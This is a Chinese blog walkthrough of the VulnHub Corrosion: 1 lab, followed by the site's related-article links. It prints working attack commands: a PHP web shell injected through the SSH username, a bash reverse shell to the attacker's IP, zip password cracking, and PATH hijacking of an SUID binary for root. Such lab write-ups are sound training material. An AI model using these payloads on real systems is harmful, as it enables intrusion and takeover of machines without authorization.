vulnhub靶机corrosion1

最新推荐文章于 2024-02-21 21:00:05 发布
最新推荐文章于 2024-02-21 21:00:05 发布
阅读量612 收藏 2
点赞数 2
分类专栏: vulnhub 文章标签: vulnhub 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52450702/article/details/127904781
版权

靶机下载地址:Corrosion: 1 ~ VulnHub

Kail IP:192.168.174.128

Corrosion ip:192.168.174.133

思路:

  • 靶机端口扫描,
  • ssh日志反弹shell,
  • linpeas脚本扫描,
  • 备份文件发现密码,
  • 爆破zip压缩包,
  • 修改环境变量提权。

一、信息搜集

靶机ip发现

nmap端口扫描

目录发现,这里使用的是dirsearch,发现只有一个任务目录

python dirsearch.py -u http://192.168.174.133

查看task,发现作者留下的有三个挑战任务

# Tasks that need to be completed

1. Change permissions for auth log

2. Change port 22 -> 7672

3. Set up phpMyAdmin

二、ssh日志反弹shell

先做任务1,更改身份验证日志的权限

这里使用的dirsearch字典不够用,没找到做题思路,这里使用gobuster进行扫描,使用的是seclists下的字典

gobuster dir -u http://192.168.174.133 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

seclists字典下载命令是apt-get install seclists

gobuster下载;apt-get install gobuster

如果不能下载就需要先更新apt-get update

gobuster扫描结果如下

这里就扫描到了另外一个目录,进入查看,发现这个人交randy

这里再对192.168.174.133/blog-post/进行扫描

在archives中发现一个php文件

192.168.174.133/blog-post/archives/randylogs.php 发现什么都没有

这里php可能存在文件泄露,这里来检测一下是否有文件泄露,使用ffuf来枚举参数

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'http://192.168.174.133/blog-post/archives/randylogs.php?FUZZ=/etc/passwd' -fs 0

这里介绍一下参数

-c是彩色打印 -w是字典 -u是url -fs是不输出返回大小为0的值

这里知道参数是file之后开始进行文件读取

发现能读取/etc/passwd但是不能读取/etc/shadow

根据我们的三个任务 第一个是auth.log

这个文件是用来记录ssh登录的一个文件

所在目录为/var/log/auth.log

查看这个文件

这里可以看到ssh登录的日志信息

这里使用ssh一个任意名称进行连接,然后再去查看一下日志信息,看他的记录情况

可以看到这里记录了我的登录名称和我的ip

这里尝试写入一个恶意代码

ssh ‘<?php system($_GET[“cmd”]); ?>’@192.168.174.133

密码直接回车报错就行

查看日志文件

192.168.174.133/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=id

配合我们输入的一句话,变量名为cmd,输入id等于cmd进行命令执行查看当前用户

发现有id指令的信息返回

接着使用bash反弹shell

bash -c "bash -i >& /dev/tcp/192.168.174.128/6666 0>&1"

将命令进行url编码后进行访问

192.168.174.133/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=bash -c %27bash -i %26%2Fdev%2Ftcp%2F192.168.174.128%2F6666 0>%261%27

nc进行监听6666端口

可以看到shell已经反弹

三、提权

查看有没有suid权限的命令

find / -perm -u=s -type f 2>/dev/null

发现有很多命令,先使用脚本来扫描一下

这个脚本非常厉害,可以枚举linux操作系统几乎所有的可提权项,甚至可以通过su暴力破解本地密码,输出非常多,下载连接

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

python开启服务,然后在靶机下载linpeas脚本开启扫描

切换到tmp目录,wget下载脚本,chmod赋予执行权限

开始扫描

这里扫描到了一个cve提权漏洞,但是下载运行发现靶机不能使用make命令,所以没成功

看了大福师傅的视频,想着自己扫到漏洞想自己做一下,看来还是得按着师傅的思路来

这里查看var下的备份目录backups

其中返现user压缩包  这里尝试解压失败,需要密码,python开启服务,下载到kali进行解压破解

python3 -m http.server 8888

下载后提取压缩包的hash

可以使用john计算hash文件得到密码

这里尝试john了但是真的好慢,还是使用专业的吧(所谓术业有专攻)

也可以使用专门针对zip的的工具fcrackzip,使用的命令是

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u user_backup.zip

-D是使用自己的字典,-p是使用的字典 -u是要破解的zip压缩包

速度非常快

我们现在得到了密码

使用unzip user_backup.zip

解压缩得到三个文件,这里包括公钥和密码等

查看一下c脚本

尝试使用ssh登录,之前在博客主页发现姓名叫randy

发现ssh登录使用不适用私钥都一样可以登录

查看randy的权限

查看一下这个easysysinfo

发现是可执行文件,执行查看

观察发现这些输出,刚好就是我们解压文件后得到的源码

这里尝试修改环境变量替换cat

命令:

cd /tmp

touch cat

echo ‘/bin/bash -p’ > cat

chmod u+x cat

cat cat

设置环境变量,优先加载tmp目录下的cat,不成功后再执行原来的cat

export PATH=/tmp:$PATH

查看环境变量,发现设置成功

再次执行easyinfosys脚本

这时候使用的cat就是我们写的tmp目录下在cat了

发现已经变为root权限,切换到root目录,使用vim或者nano查看flag

结尾推荐一下b站大福师傅的课

再分析一篇在Linux中使用环境变量进行提权 - FreeBuf网络安全行业门户

这个靶机的提权对应这个文章的方法三

差不多一个月,从开始到入门,也是打了15台靶机了,这周写一篇总结,总结一下在vulnhub靶机中所学到的知识吧。

Ie802.3
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SecLists:彭特氏伴侣-开源
04-25
SecLists是最终的安全测试人员的伴侣。 它是安全评估期间常用的各种类型列表的集合,所有这些都集中在一个地方。 SecLists通过方便地在一个存储库中提供安全测试人员可能需要的所有列表,来帮助提高安全测试的效率和生产率。 列表类型包括用户名,密码,URL,模糊有效载荷,敏感数据模式,Web Shell等。 测试人员所需要做的就是将这个仓库放入一个新的测试箱中,他将可以访问他可能需要的每种列表。
Vulnhub】之Nagini
zg_111的博客
04-13 1338
根据之前得到的bak配置文件,我们知道服务器启用了Mysql数据库,并且用户名为goblin,密码为空,接下来我们可以使用gopher协议查询Joomla的后台管理员账密,从而登陆至Web后台进行下一步操作。在hermoine用户文件夹下,我们发现了隐藏的文件夹.mozilla,该文件夹是在linux操作系统中使用firefox浏览器后,在当前用户的目录下就会生成给.mozilla目录,进入该文件夹,可以发现当前浏览器中的安装的扩展包、配置信息及包括浏览器登录某些web应用后记录下的用户名和密码信息。
vulnhub靶场之Deathnote
最新发布
qq_58091216的博客
02-21 1050
现在我们知道用户名,不知道密码,我们前面扫描到robots.txt,有一个提示说在important.jpg添加了提示,那么我们就在网站图片上面找。发现了文件的路径获得密码字典,那么肯定是有用的,我们想到22端口是开放的,我们可以试试爆破ssh。首先,我们进入fake-notebook-rule,发现了2个文件,一个是加密的数字,一个是提示。我们查看根目录下的内容,发现了user.txt文件,我们进行查看。我们可以看到登录成功,我们进行查看,看有没有可以利用的地方。
Vulnhub靶机下载和使用
laoyanCZ的博客
11-26 809
一、何为Virtualbox? ​​​​​Virtualbox跟Vmware一样,是创建虚拟机的软件,两者的功能基本上是一样的。 那我们为什么要安装Virtualbox呢?因为Vulnhub上面的靶机在导入到Virtualbox会稳定一些,基本上不会出现什么兼容性的问题,而导入到Vmware可能会报一些错误,就导致我们无法正常导入,所以我们一般都用Virtualbox来打开Vulnhub上的靶机。二、博主的渗透环境 博主一般都是习惯于kali安装在Vmware里面,
网络安全零基础入门】002、OWASP靶机下载与安装(超详细,亲测可用)
热爱技术,热爱生活
07-23 1548
OWASP靶机下载与安装(超详细,亲测可用)
vulnhub靶机DC1
weixin_52450702的博客
10-29 856
靶机DC1IP:192.168.70.160。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
VulnHub narak
weixin_45682839的博客
10-21 1062
涉及知识包括:主机存活探测、端口服务探测、WEB信息搜集、WEB爆破专用字典生成、暴力破解、webdav PUT上传、linux本地提权、Brainfuck加解密、motd文件注入提权等。
一次在vulnhub下载靶场的渗透练习
hcufo的博客
09-25 148
下载好通过管理——————导入虚拟电脑——一直下一步就行了。安装好后开始主机探测,使用namp或者arp-scan等。只有一个介绍页面,那试试爆破路径,看看有没有后台啥的。到这个用户下查看,有文本,查看一下有flag了‘’表面没看出什么,用string查看有没有影藏内容。由于lily的秘钥和remu一样,那登录尝试。查到到相应版本到漏洞数据库网站上面去查找。只扫描到一个页面,查看源代码看看有提示。如报错,右击设置关闭USB设备控制器。做不走了,开始访问web页面看看提示。用工具分析,需要密码。
VulnHub靶场-Tiki
hxync的博客
08-08 907
靶场下载地址:tiki. 下载之后导入virtualbox启动 不能直接看到IP地址 先看一下kali的ip: Nmap扫一下192.168.1.0/24网段的主机,找到了靶机的IP地址 再扫一下靶机开放的端口: 开放了22 80 139 445 这四个端口 浏览器访问80端口没有发现什么有用的东西 Dirbuster扫一下目录 浏览器访问一下扫到的robots.txt 发现robots.txt文件里也有扫到的tiki目录,访问一下 发现提示是tikiwikicms 再加上下载靶场时有提示是cve漏洞
Vulnhub 靶场】【hacksudo: FOG】【简单 - 中等】【20210514】
惟忆
12-05 1194
靶场介绍:https://www.vulnhub.com/entry/hacksudo-fog,697/ 靶场下载:https://download.vulnhub.com/hacksudo/hacksudo-FOG.zip 靶场难度:简单 - 中等 发布日期:2021年05月14日 文件大小:1.3 GB 靶场作者:Vishal Waghmare 靶场系列:hacksudo 打靶耗时:3+小时,倒不是很难,就是步骤有点多,有点绕
看完这篇 教你玩转渗透测试靶机vulnhub——DC8
Aluxian_的博客
04-07 1841
Vulnhub靶机DC8渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC8 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.c
MS08-067靶机下载
边城浪子的博客
09-08 1593
利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,无奈没有靶机实验,真实的互联网中也没有这样的漏洞啊。 MS08-067靶机下载地址 链接: https://pan.baidu.com/s/13IS0vBZTduDHdInOrO4pyQ 提取码: ip53
Vulnhub 靶场】【Funbox: Lunchbreaker】【简单】【20210522】
惟忆
12-02 876
靶场介绍:https://www.vulnhub.com/entry/funbox-lunchbreaker,700/ 靶场下载:https://download.vulnhub.com/funbox/FunboxLunchbreaker.ova 靶场难度:简单 发布日期:2021年05月22日 文件大小:1.6 GB 靶场作者:0815R2d2 靶场系列:Funbox 靶场描述:这是一个初学者的盒子,可以在午休时打开。这在VirtualBox而不是VMware中更有效 打靶耗时:4+小时,技术上没有什么难
Vulnhub 靶场】【Funbox: GaoKao】【简单】【20210606】
惟忆
12-08 1060
靶场介绍:https://www.vulnhub.com/entry/funbox-gaokao,707/ 靶场下载:https://download.vulnhub.com/funbox/FunboxGaoKao.ova 靶场难度:简单 发布日期:2021年06月06日 文件大小:1.3 GB 靶场作者:0815R2d2 靶场系列:Funbox 靶场描述:打靶耗时:2+小时,非常的简单,而且不用做长时间爆破(我做的时候没看提示,所以依然做了一些爆破和目录扫描)
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值